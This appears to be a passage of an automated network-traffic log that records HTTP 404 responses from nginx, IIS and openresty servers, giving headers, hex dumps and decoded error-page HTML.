64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Sun, 08 Sep 2024 06:58:44 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 08 Sep 2024 06:58:46 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 08 Sep 2024 06:58:46 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Sun, 08 Sep 2024 06:59:56 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 08 Sep 2024 06:59:57 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 08 Sep 2024 06:59:57 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Sun, 08 Sep 2024 07:00:10 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 08 Sep 2024 07:00:11 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 08 Sep 2024 07:00:11 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Sun, 08 Sep 2024 07:00:10 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 